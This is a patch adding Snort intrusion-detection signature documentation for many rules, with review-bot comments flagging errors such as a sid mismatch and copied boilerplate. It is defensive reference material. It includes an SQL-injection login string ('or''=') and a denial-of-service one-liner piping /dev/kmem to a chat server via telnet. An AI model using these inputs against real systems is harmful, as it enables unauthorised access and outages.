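Review bot: the CVE reference uses the old candidate prefix (`+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1520`); CAN- identifiers were converted to CVE- in 2005, so the entry is now CVE-1999-1520 and the link should use that name. The double spaces after sentences in Impact, Detailed Information and `+Simple.  ` are inconsistent with the rest of the patch.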
--- /dev/null
+++ b/doc/signatures/2867.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2867
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_unique_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
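Review bot: the procedure name in Detailed Information is split across lines with the full stop orphaned (`+vulnerability in the procedure add_unique_resolution` / `+. This procedure is included in`), which reads as a broken sentence; join it as "...in the procedure add_unique_resolution. This procedure is included in sys.dbms_repcat_conf." The Affected Systems entry `+	Oracle Oracle9i` duplicates the vendor name, and Additional References is empty for a vulnerability that has a vendor alert which should be cited.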
--- /dev/null
+++ b/doc/signatures/2707.txt
@@ -0,0 +1,75 @@
+Rule: 
+
+--
+Sid: 
+2707
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft GDI using a malformed JPEG image.
+
+-- 
+
+Impact: 
+Serious. Execution of arbitrary code is possible. Denial of Service
+(DoS),
+
+--
+Detailed Information:
+The Microsoft Graphics Device Interface contains a programming error
+in the handling of Joint Photographics Experts Group (JPEG) files. This
+error may allow an attacker to execute code of their choosing on a
+vulnerable system.
+
+Due to the popularity of jpeg files, and in order to provide accurate
+detection for the GDI JPEG vulnerability, sid 2705 may generate false
+positive events in certain situations. Since this rule may generate
+a number of false positives it is disabled by default.
+
+In order to avoid potential evasion techniques, http_inspect should be
+configured with "flow_depth 0" so that all HTTP server response traffic is
+inspected.
+
+WARNING
+Setting flow_depth 0 will cause performance problems in some situations.
+WARNING
+
+--
+Affected Systems:
+	All Microsoft systems including multiple Microsoft products
+
+--
+Attack Scenarios: 
+An attacker would need to supply a malformed jpeg image to a victim and
+have the use attempt to view the file.
+
+-- 
+Ease of Attack: 
+Medium.
+
+-- 
+
+False Positives:
+False positive events are known to occur with this rule, the incidence
+is low but may be an inconvenience in some installations.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
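Review bot: the Detailed Information text refers to a different rule than the one this file documents: `+detection for the GDI JPEG vulnerability, sid 2705 may generate false` / `+positive events in certain situations.` appears under Sid 2707. Either the paragraph was copied from 2705.txt or the sid is wrong; check which rule is actually disabled by default and correct the text. Also fix `+have the use attempt to view the file.` to "have the user attempt", and the Impact line ends in a comma (`+(DoS),`) rather than a full stop.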
--- /dev/null
+++ b/doc/signatures/2117.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2117
+--
+Summary:
+This event is generated when an attempt is made to access the file myaccount/login.asp in the BTTLXE Forum application from Battleaxe Software.
+
+--
+Impact:
+Possible theft of data and control of the targeted application leading to a compromise of all resources on the machine not limited to user accounts and business data.
+
+--
+Detailed Information:
+The BTTLXE Forum is a web application used for web-based discussion forums.
+
+A vulnerability exists such that an attacker may gain control of the application via an SQL injection technique. One such scenario allows an attacker to access the system by supplying a specific password without a username in the login page.
+
+Affected Systems:
+	All versions of BTTLXE Forum software.
+
+--
+Attack Scenarios:
+The attacker may login to the Forum with the password 'or''='
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Refer to the vendor notification and fix information at http://www.battleaxesoftware.com/forums/forum.asp?forumid=36&select=1812
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0215
+
+Bugtraq:
+http://www.securityfocus.com/bid/7416
+
+Vendor:
+http://www.battleaxesoftware.com/forums/forum.asp?forumid=36&select=1812
+
+--
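Review bot: the `--` separator is missing before `+Affected Systems:` (the Detailed Information section runs straight into it after `+... without a username in the login page.`), and the blank line between `+2117` and `+--` is missing, so a section-based parser will merge these sections. Add the separator and blank line to match the other files.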
--- /dev/null
+++ b/doc/signatures/100000845.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000845
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Invision Power Board" application running on a webserver. Access to the file "ipsclass.php" with SQL commands being passed as the "HTTP_CLIENT_IP" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "HTTP_CLIENT_IP" parameter in the "ipsclass.php" script used by the "Invision Power Board" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Invision Power Board
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
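Review bot: `HTTP_CLIENT_IP` is described as a "parameter" (`+... SQL commands being passed as the "HTTP_CLIENT_IP" parameter ...`), but it is the CGI/PHP server variable populated from the Client-IP request header, not a query or form parameter; the text should refer to the Client-IP header so anyone tuning the rule understands the detection is on request headers rather than the URI. The third Detailed Information paragraph is again the generic credential-checking boilerplate and does not apply to SQL injection, `running ona web server` needs a space, and the blank lines before `--` are missing after `+All systems running CGI applications using Invision Power Board` and after the Contributors list.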
--- /dev/null
+++ b/doc/signatures/100000586.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000586
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "db_alter_change.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"db_alter_change.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
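Review bot: the third Detailed Information paragraph and the Attack Scenarios section are the generic CGI-authentication text (`+An attacker can access an authentication mechanism and supply his/her own `) rather than a description of a remote file include via `admin_template_path`; trim them to the RFI case. Most wrapped lines carry trailing spaces (e.g. `+This event is generated when an attempt is made to exploit a remote file `), `ona web server` needs a space, and the blank line before `--` after `+All systems running CGI applications using Indexu` is missing.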
--- /dev/null
+++ b/doc/signatures/1036.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1036
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
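Review bot: nothing in this file says what the rule actually matches; Summary and Detailed Information only state that IIS has many vulnerabilities (`+vulnerabilities exist for this platform and the attack scenarios are` / `+legion.`), which leaves an analyst unable to triage the alert or judge false positives. State the request pattern sid 1036 looks for and which IIS issue it relates to, and cite that issue under Additional References, which is empty.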
--- /dev/null
+++ b/doc/signatures/2436.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2436
+
+--
+Summary:
+This event is generated when an attempt is made to access a file type
+that may be subject to a known vulnerability in Microsoft Windows Explorer.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+When processing Windows Extended Metafile Format (.emf) files, Windows
+Explorer sets a buffer size based on information in the header for the
+file. If a malformed header is sent, it may be possible for an attacker
+to cause a DoS condition to occur. It may also be possible for an
+attacker to execute code of their choosing on a vulnerable host.
+
+This issue may also affect Microsoft Windows Metafile Format (.wmf)
+files also.
+
+--
+Affected Systems:
+	Microsoft Windows XP Home, Professional and Media Center Edition
+	Microsoft Windows XP Home and Professional SP-1
+
+--
+Attack Scenarios:
+An attacker might supply a specially crafted request for such a file
+that might cause the error condiion to occur.
+
+--
+Ease of Attack:
+Moderate/Difficult
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
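Review bot: `+that might cause the error condiion to occur.` has a typo ("condition"), and `+This issue may also affect Microsoft Windows Metafile Format (.wmf)` / `+files also.` repeats "also". The Impact line `+Denial of Service (DoS) possible execution of arbitrary code.` needs punctuation between the two outcomes, and Additional References is empty although the Affected Systems list implies a specific Microsoft bulletin that should be cited.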
--- /dev/null
+++ b/doc/signatures/100000593.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000593
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "head.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "head.php" script 
+used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
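Review bot: this file is a copy of 100000586.txt with only the script name changed (`+"admin_template_path" parameter in the "head.php" script `), so it inherits the same defects: generic credential-checking boilerplate in Detailed Information and Attack Scenarios that does not describe a remote file include, `running ona web server` missing a space, trailing spaces on wrapped lines, and a missing blank line before `--` after the Affected Systems entry. Fixing the shared template once and regenerating these Indexu files would be cleaner than patching each copy.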
--- /dev/null
+++ b/doc/signatures/1912.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1912
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) sadmind.
+
+--
+Impact:
+Remote root access. This attack may permit execution of arbitrary
+commands with the privileges of root.
+
+--
+Detailed Information:
+The sadmind RPC service is used by Solaris Solstice AdminSuite
+applications to perform remote distributed system administration tasks
+such as adding new users. A buffer overflow associated with the
+NETMGT_PROC_SERVICE request of sadmind exists because of improper bounds
+checking. This may permit execution of arbitrary commands with the
+privileges of root.
+
+--
+Affected Systems:
+	Sun Solaris 2.5, 2.5.1, 2.6, 7.0
+
+--
+Attack Scenarios:
+Exploit code can be used to attack a vulnerable sadmind to obtain root
+access to the remote host.
+
+--
+Ease of Attack:
+Simple. Exploit scripts are freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
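Review bot: Corrective Action lists only network filtering (`+Limit remote access to RPC services.`, `+Filter RPC ports at the firewall ...`, `+Disable unneeded RPC services.`) and never says to apply the vendor patch for the sadmind overflow, which is the fix the other files in this patch recommend; add it. Additional References is empty even though Affected Systems pins specific Solaris releases, so the vendor advisory and CVE entry for this issue should be cited.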
--- /dev/null
+++ b/doc/signatures/2278.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+2278
+
+--
+Summary:
+This event is generated when an attempt is made to exploit
+a Denial of Service (DoS) condition in the Monit web server.
+
+--
+Impact:
+Denial of Service.
+
+--
+Detailed Information:
+The Monit web server does not perform stringent checks on HTTP
+parameters prior to processing. This may allow a remote attacker to
+issue a DoS condition against a server running Monit.
+
+--
+Affected Systems:
+	Monit 4.1 and prior
+
+--
+Attack Scenarios:
+By supplying certain HTTP parameters to the Monit server a DoS condition
+may be executed.
+
+--
+Ease of Attack:
+Simple. Exploit code exists but is not currently in the public domain.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
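Review bot: Detailed Information and Attack Scenarios are too vague to be actionable (`+By supplying certain HTTP parameters to the Monit server a DoS condition` / `+may be executed.`); say which parameter or request the rule inspects. `+Simple. Exploit code exists but is not currently in the public domain.` presumably means the code is not publicly available rather than a statement about copyright; reword to "is not publicly available". Additional References is empty for an issue with a stated affected version (`+	Monit 4.1 and prior`).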
--- /dev/null
+++ b/doc/signatures/1870.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1870
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
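Review bot: this is the generic CGI template that several other files in this patch copy from, so its defects propagate: `+access to a CGI application running ona web server. Some applications do` is missing a space, and `+relationships between the victim server and other hosts can be exploited by the attacker.` is not wrapped like the surrounding lines. Fix them here first, then the copies. The Summary also never names which CGI application or request sid 1870 matches.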
--- /dev/null
+++ b/doc/signatures/3154.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+2922
+
+-- 
+Summary: 
+This event is generated when an inverse query attempt is made using UDP.
+
+-- 
+
+Impact: 
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Bind 8 contains a programming error that may present an attacker with
+the opportunity to execute code of their choosing on an affected server.
+
+The error occurs in the handling of malformed transactions. When using
+UDP this can result in the attacker causing a heap overflow.
+
+--
+Affected Systems:
+	Bind 8.
+
+--
+Attack Scenarios: 
+An attacker needs to send a specially crafted and malformed query to an
+affected server.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+-- 
+Additional References:
+
+
+--
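Review bot: the Sid in this file does not match its filename: the file is `doc/signatures/3154.txt` but the header says `+Sid: ` / `+2922`. One of the two is wrong, and since lookup is by sid the file would document the wrong rule; check the rule set and correct whichever is in error. Additional References is empty although Detailed Information describes a specific BIND 8 heap overflow that should be cited, and there are stray blank lines after the Contributors list and after `+Additional References:`.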
--- /dev/null
+++ b/doc/signatures/119-9.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+119-9
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to obfuscate an attack or an attempt to
+evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the pre-processor http_inspect detects a
+"\" character being used where a "/" is normally expected in a web
+request.
+
+This may be an attempt to obfuscate an attack or an attempt to evade an
+IDS.
+
+--
+Affected Systems:
+	Microsoft IIS web servers.
+
+--
+Attack Scenarios: 
+An attacker merely needs to use a "\" character instead of a "/"' in a
+web request.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
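Review bot: `+An attacker merely needs to use a "\" character instead of a "/"' in a` has a stray apostrophe after the closing quote. The blank line after `+-- ` before `+Corrective Action:` and the trailing space in `+Daniel Roelker <droelker@sourcefire.com> ` are inconsistent with the other files.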
--- /dev/null
+++ b/doc/signatures/1605.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+
+1605
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of Service to a host running iParty.
+
+--
+Impact:
+Denial of Service.
+
+--
+Detailed Information:
+iParty is an audio/text chat program for Windows.  The iParty server listens on a specified port 6004 for client requests. An attacker can connect to the chat server and send a large amount of '^?' characters (ASCII 255 or Hex FF), the server will simply shutdown and disconnect all the current users.  
+
+--
+Affected Systems:
+	iParty prior to 1.2
+
+--
+Attack Scenarios:
+cat /dev/kmem | telnet target 6004
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+http://www.securityspace.com/smysecure/catid.html?id=10111
+
+--
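Review bot: the character description in Detailed Information is self-contradictory: `+... send a large amount of '^?' characters (ASCII 255 or Hex FF), ...`. The caret notation `^?` denotes DEL, which is decimal 127 / 0x7F; decimal 255 / 0xFF is a different byte. Pick one and state it consistently, because the rule's content match has to correspond to the byte the server actually fails on. The stray blank line between `+Sid:` and `+1605` should also go.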
--- /dev/null
+++ b/doc/signatures/453.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+453
+
+--
+Summary:
+This event is generated when an ICMP Timestamp request is made.
+
+--
+Impact:
+Information gathering.  An ICMP Timestamp request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP Timestamp request is used by the ping command to elicit an ICMP Timestamp reply from a listening live host.  This rule alerts on a generic ICMP request where no payload is included in the message or the payload does not match more specific rules. 
+
+If ICMP type 8 (echo) traffic is filtered at a firewall, and attacker may try to use type 13 (timestamp) as an alternative.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP Timestamp request may be used to legitimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP Timestamp requests.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Additional information by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+
+--
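Review bot: the first Detailed Information paragraph appears to be copied from the ICMP echo request documentation and is wrong for this rule: `+An ICMP Timestamp request is used by the ping command to elicit ...` and the remark about "no payload" describe echo (type 8). ping sends echo requests by default (only some implementations can emit a timestamp request via an option), and a type 13 message carries a fixed set of originate/receive/transmit timestamp fields rather than an arbitrary payload. Keep the second paragraph (type 13 as an alternative when type 8 is filtered) and rewrite the first. Also `+If ICMP type 8 (echo) traffic is filtered at a firewall, and attacker may try` should read "an attacker", and there is a stray blank line after `+Additional References:`.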
--- /dev/null
+++ b/doc/signatures/2401.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2401
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISS RealSecure and BlackICE products.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the ISS Analysis Module can be triggered
+by an attacker sending a single SMB packet containing an AccountName
+greater than 300 bytes. It is possible for an attacker to exploit this
+condition by sending a specially crafted packet to a host serving network shares.
+
+When the systems running one of the affected ISS products decodes the
+SMB data, exploit code may be included and executed on the machine with 
+system level privileges. Alternatively, the malformed data may cause the service to become 
+unresponsive and cause a DoS condition.
+
+Sensors under attack will display "PAM_internal_error" as a message on
+the console.
+
+Sucessful exploitation of this issue could present an attacker with the 
+opportunity to execute code of their choosing on the target host with system
+privileges. It is also possible for a Denial of Service (DoS) condition to 
+be caused by an attacker attempting to exploit this condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 20.15 through 22.9
+	Real Secure Server Sensor 7.0 XPU 20.16 through 22.9
+	Proventia A Series XPU 20.15 through 22.9
+	Proventia G Series XPU 22.3 through 22.9
+	Proventia M Series XPU 1.3 through 1.7
+	RealSecure Desktop 7.0 eba through ebh
+	RealSecure Desktop 3.6 ebr through ecb
+	RealSecure Guard 3.6 ebr through ecb
+	RealSecure Sentry 3.6 ebr through ecb
+	BlackICE PC Protection 3.6 cbr through ccb
+	BlackICE Server Protection 3.6 cbr through ccb
+
+--
+Attack Scenarios:
+An attacker may use this vulnerability to disable ISS sensors on a
+network or potentially use it to gain control of a machine running one
+of the affected products.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+This rule may not generate an alert if a legitimate SMB request contains a password
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+eEye
+http://www.eeye.com/html/Research/Advisories/AD20040226.html
+
+Bugtraq
+http://www.securityfocus.com/bid/9752
+
+--
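Review bot: the second and fourth Detailed Information paragraphs say the same thing (code execution with system privileges, DoS), so `+Sucessful exploitation of this issue could present an attacker with the ` onwards can be folded into the earlier paragraph, fixing the "Successful" typo in the process. The False Negatives entry `+This rule may not generate an alert if a legitimate SMB request contains a password` does not explain the condition; state which part of the rule's content match fails in that case. The section header `+References:` should be `Additional References:` as in the other files.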
--- /dev/null
+++ b/doc/signatures/1673.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1673
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
